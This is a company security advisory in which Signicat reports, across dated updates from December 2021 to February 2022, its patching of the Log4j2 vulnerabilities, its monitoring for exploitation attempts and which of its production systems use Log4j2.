Apache Log4j2 RCE vulnerability (CVE-2021-44228)
Signicat is aware of and has acted on the security vulnerability in the open-source Apache Log4j2 utility (NVD - CVE-2021-44228).
Last updated on 11.02.2022 @ 14:00 CET
Signicat continues to monitor the situation closely. As previously mentioned there have been no indications of successful attacks in Signicat or third party provider environments.
Log4j has been upgraded to version 2.17.x on the majority of our software and is expected to complete shortly. Please note from the previous announcement that no attack vectors have been found for exploiting Signicat software using log4j 2.16.x.
Any new security information related to log4j will be assessed and acted upon.
Update 22.12.2021 @ 14:45 CET
- CVE-2021-44228 - (Remote code execution) Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
- CVE-2021-45046 - (Remote code execution) Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations
- CVE-2021-45105 - (Denial of service) Apache Log4j2 does not always protect from infinite recursion in lookup evaluation
The log4j vulnerabilities have been seen in both inhouse and third party software used in our various environments. Ease of exploitation and public exploitation knowledge has increased the priority of applying patches and mitigations as soon as possible.
Third party products have been patched with vendor patches. Inhouse developed software is at a minimum on software version 2.16.
Source code analysis of the attack vectors for CVE-2021-45105 (denial of service) has not revealed any vulnerable services and therefore the upgrade to version 2.17 is not seen as necessary at this moment. However we continue to monitor the situation closely and software packages utilizing log4j version 2.17 are ready to deploy at a moment’s notice, if needed.
Signicat has also kept track of the patch status of third party service providers. The response has been swift and no security impact has been seen on service provider’s or Signicat services in the service provider environments.
No signs of compromise have been detected in Signicat or third party service provider environments.
Update 16.12.2021 @ 10:34 CET
Signicat production systems have been patched, mitigated, or were not affected. There is still work in progress for internally used software and components where we are awaiting patches and status from some vendors, but the majority are patched, mitigated, or not affected.
We have been monitoring attempts of exploitation of the vulnerability, and after the news from ZDNet.com we have broadened our search to look for attempts also before 2021-12-01. Our investigation shows that the earliest attempts of exploitation towards Signicat systems was 2021-12-09T23:22, with no sign of successful exploitation. We are still monitoring and following the situation.
We are currently assessing and acting on the new Apache Log4j vulnerability (CVE-2021-45046), where the mitigations of CVE-2021-44228 was incomplete.
Current result of Signicat’s investigation of production systems that use Log4j2:
- Signicat Enterprise SaaS products
- Signicat Enterprise monitoring system
- Signicat Enterprise hosting provider backup service
- Signicat Identity Broker
- Signicat eHerkenning Broker
- Signicat MyOwnIDP / CIAM
- MySignicat / MyConnectis
- Signicat Dokobit monitoring system
- Signicat Dokobit HSM service